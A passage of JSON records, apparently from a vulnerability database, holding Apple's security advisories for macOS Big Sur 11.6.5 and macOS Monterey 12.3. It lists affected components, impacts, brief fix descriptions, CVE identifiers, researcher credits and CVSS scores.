"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22582", "CVE-2022-22589", "CVE-2022-22597", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22665", "CVE-2022-22672", "CVE-2022-26688", "CVE-2022-26691", "CVE-2022-46706"], "modified": "2022-03-14T00:00:00", "id": "APPLE:A07531C05C19836B4B65E06C7D7BB300", "href": "https://support.apple.com/kb/HT213185", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-26T22:43:53", "description": "# About the security content of macOS Big Sur 11.6.5\n\nThis document describes the security content of macOS Big Sur 11.6.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Big Sur 11.6.5\n\nReleased March 14, 2022\n\n**Accelerate Framework**\n\nAvailable for: macOS Big Sur\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-22633: ryuzaki\n\nEntry updated May 25, 2022\n\n**AppKit**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2022-22665: Lockheed Martin Red Team\n\nEntry added May 25, 2022\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22631: Wang Yu of cyberserval\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to read restricted memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22648: Mickey Jin (@patch1t) of Trend Micro\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\n**BOM**\n\nAvailable for: macOS Big Sur\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**CUPS**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26691: Joshua Mason of Mandiant\n\nEntry added May 25, 2022\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-46706: Wang Yu of Cyberserval, and Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry added May 11, 2023\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-22661: Wang Yu of Cyberserval and Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry updated May 25, 2022, updated May 11, 2023\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: Alex, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22615: an anonymous researcher\n\nCVE-2022-22614: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22632: Keegan Saunders\n\n**Login Window**\n\nAvailable for: macOS Big Sur\n\nImpact: A person with access to a Mac may be able to bypass Login Window\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22647: Yuto Ikeda of Kyushu University\n\nEntry updated May 25, 2022\n\n**LoginWindow**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2022-22656\n\n**MobileAccessoryUpdater**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-22672: Siddharth Aeri (@b1n4r1b01)\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22617: Mickey Jin (@patch1t)\n\n**PackageKit**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious app with root privileges may be able to modify the contents of system files\n\nDescription: An issue in the handling of symlinks was addressed with improved validation.\n\nCVE-2022-26688: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**QuickTime Player**\n\nAvailable for: macOS Big Sur\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Siri**\n\nAvailable for: macOS Big Sur\n\nImpact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen\n\nDescription: A permissions issue was addressed with improved validation.\n\nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)\n\nEntry updated May 25, 2022\n\n**SMB**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22651: Felix Poulin-Belanger\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**xar**\n\nAvailable for: macOS Big Sur\n\nImpact: A local user may be able to write arbitrary files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2022-22582: Richard Warren of NCC Group\n\n\n\n## Additional recognition\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**TCC**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 11, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.6.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22651", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22665", "CVE-2022-22672", "CVE-2022-26688", "CVE-2022-26691", "CVE-2022-46706"], "modified": "2022-03-14T00:00:00", "id": "APPLE:8BB162E4A512616135B4203D7F1AA9CD", "href": "https://support.apple.com/kb/HT213184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-09T14:22:37", "description": "# About the security content of macOS Monterey 12.3\n\nThis document describes the security content of macOS Monterey 12.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Monterey 12.3\n\nReleased March 14, 2022\n\n**Accelerate Framework**\n\nAvailable for: macOS Monterey\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-22633: ryuzaki\n\nEntry updated May 25, 2022\n\n**AMD**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22669: an anonymous researcher\n\n**AppKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2022-22665: Lockheed Martin Red Team\n\n**AppleEvents**\n\nAvailable for: macOS Monterey\n\nImpact: A remote attacker may cause an unexpected app termination or arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22630: Jeremy Brown working with Trend Micro Zero Day Initiative\n\nEntry added June 8, 2023\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22631: Wang Yu of cyberserval\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to read restricted memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22648: Mickey Jin (@patch1t) of Trend Micro\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\n\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\n**BOM**\n\nAvailable for: macOS Monterey\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**CoreTypes**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks to prevent unauthorized actions.\n\nCVE-2022-22663: Arsenii Kostromin (0x3c3e)\n\nEntry added May 25, 2022\n\n**CUPS**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26691: Joshua Mason of Mandiant\n\nEntry added May 25, 2022\n\n**curl**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in curl\n\nDescription: Multiple issues were addressed by updating to curl version 7.79.1.\n\nCVE-2021-22946\n\nCVE-2021-22947\n\nCVE-2021-22945\n\nEntry updated March 21, 2022\n\n**FaceTime**\n\nAvailable for: macOS Monterey\n\nImpact: A user may send audio and video in a FaceTime call without knowing that they have done so\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida\n\n**GarageBand MIDI**\n\nAvailable for: macOS Monterey\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2022-22657: Brandon Perry of Atredis Partners\n\n**GarageBand MIDI**\n\nAvailable for: macOS Monterey\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22664: Brandon Perry of Atredis Partners\n\n**Graphics Drivers**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2021-30977: Jack Dates of RET2 Systems, Inc.\n\nEntry added May 25, 2022\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22611: Xingyu Jin of Google\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2022-22612: Xingyu Jin of Google\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-46706: Wang Yu of Cyberserval, and Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry added June 8, 2023\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-22661: Wang Yu of Cyberserval and Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry updated May 25, 2022, updated June 8, 2023 \n\n**IOGPUFamily**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22641: Mohamed Ghannam (@_simo36)\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: Alex, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22614: an anonymous researcher\n\nCVE-2022-22615: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22632: Keegan Saunders\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22640: sqrtpwn\n\n**LaunchServices**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to bypass certain Privacy preferences\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-30946: @gorelics, and Ron Masas of BreakPoint.sh\n\nEntry added June 8, 2023\n\n**libarchive**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in libarchive\n\nDescription: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.\n\nCVE-2021-36976\n\n**LLVM**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to delete files for which it does not have permission\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2022-21658: Florian Weimer (@fweimer)\n\nEntry added May 25, 2022\n\n**Login Window**\n\nAvailable for: macOS Monterey\n\nImpact: A person with access to a Mac may be able to bypass Login Window\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22647: Yuto Ikeda of Kyushu University\n\nEntry updated May 25, 2022\n\n**LoginWindow**\n\nAvailable for: macOS Monterey\n\nImpact: A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2022-22656\n\n**MobileAccessoryUpdater**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-22672: Siddharth Aeri (@b1n4r1b01)\n\nEntry added May 25, 2022\n\n**NSSpellChecker**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to access information about a user's contacts\n\nDescription: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.\n\nCVE-2022-22644: Thomas Roth (@stacksmashing) of leveldown security\n\nEntry updated May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2022-26690: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious app with root privileges may be able to modify the contents of system files\n\nDescription: An issue in the handling of symlinks was addressed with improved validation.\n\nCVE-2022-26688: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22617: Mickey Jin (@patch1t)\n\n**Preferences**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to read other applications' settings\n\nDescription: The issue was addressed with additional permissions checks.\n\nCVE-2022-22609: Mickey Jin (@patch1t), and Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nEntry updated June 8, 2023\n\n**QuickTime Player**\n\nAvailable for: macOS Monterey\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Safari Downloads**\n\nAvailable for: macOS Monterey\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**Sandbox**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to leak sensitive user information\n\nDescription: An access issue was addressed with improvements to the sandbox.\n\nCVE-2022-22655: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added June 8, 2023\n\n**Sandbox**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to bypass certain Privacy preferences\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran\n\nEntry updated May 25, 2022\n\n**Siri**\n\nAvailable for: macOS Monterey\n\nImpact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen\n\nDescription: A permissions issue was addressed with improved validation.\n\nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)\n\nEntry updated May 25, 2022\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22651: Felix Poulin-Belanger\n\n**SoftwareUpdate**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22639: Mickey Jin (@patch1t)\n\n**System Preferences**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to spoof system notifications and UI\n\nDescription: This issue was addressed with a new entitlement.\n\nCVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\n**UIKit**\n\nAvailable for: macOS Monterey\n\nImpact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22621: Joey Hewitt\n\n**Vim**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in Vim\n\nDescription: Multiple issues were addressed by updating Vim.\n\nCVE-2021-4136\n\nCVE-2021-4166\n\nCVE-2021-4173\n\nCVE-2021-4187\n\nCVE-2021-4192\n\nCVE-2021-4193\n\nCVE-2021-46059\n\nCVE-2022-0128\n\nCVE-2022-0156\n\nCVE-2022-0158\n\n**VoiceOver**\n\nAvailable for: macOS Monterey\n\nImpact: A user may be able to view restricted content from the lock screen\n\nDescription: A lock screen issue was addressed with improved state management.\n\nCVE-2021-30918: an anonymous researcher\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit Bugzilla: 232812 \nCVE-2022-22610: Quan Yin of Bigo Technology Live Client Team\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 233172 \nCVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\nWebKit Bugzilla: 234147 \nCVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nWebKit Bugzilla: 234966 \nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious website may cause unexpected cross-origin behavior\n\nDescription: A logic issue was addressed with improved state management.\n\nWebKit Bugzilla: 235294 \nCVE-2022-22637: Tom McKee of Google\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2022-22668: MrPhil17\n\n**xar**\n\nAvailable for: macOS Monterey\n\nImpact: A local user may be able to write arbitrary files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2022-22582: Richard Warren of NCC Group\n\n\n\n## Additional recognition\n\n**AirDrop**\n\nWe would like to acknowledge Omar Espino (omespino.com), Ron Masas of BreakPoint.sh for their assistance.\n\n**Bluetooth**\n\nWe would like to acknowledge an anonymous researcher, chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab for their assistance.\n\n**Disk Utility**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\nEntry added June 8, 2023\n\n**Face Gallery**\n\nWe would like to acknowledge Tian Zhang (@KhaosT) for their assistance.\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.\n\n**Local Authentication**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**Notes**\n\nWe would like to acknowledge Nathaniel Ekoniak of Ennate Technologies for their assistance.\n\n**Password Manager**\n\nWe would like to acknowledge Maximilian Golla (@m33x) of Max Planck Institute for Security and Privacy (MPI-SP) for their assistance.\n\n**Siri**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**TCC**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\n**UIKit**\n\nWe would like to acknowledge Tim Shadel of Day Logger, Inc. for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Abdullah Md Shaleh for their assistance.\n\n**WebKit Storage**\n\nWe would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: June 08, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22945", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-30918", "CVE-2021-30946", "CVE-2021-30977", "CVE-2021-36976", "CVE-2021-4136", "CVE-2021-4166", "CVE-2021-4173", "CVE-2021-4187", "CVE-2021-4192", "CVE-2021-4193", "CVE-2021-46059", "CVE-2022-0128", "CVE-2022-0156", "CVE-2022-0158", "CVE-2022-21658", "CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22600", "CVE-2022-22609", "CVE-2022-22610", "CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22613", 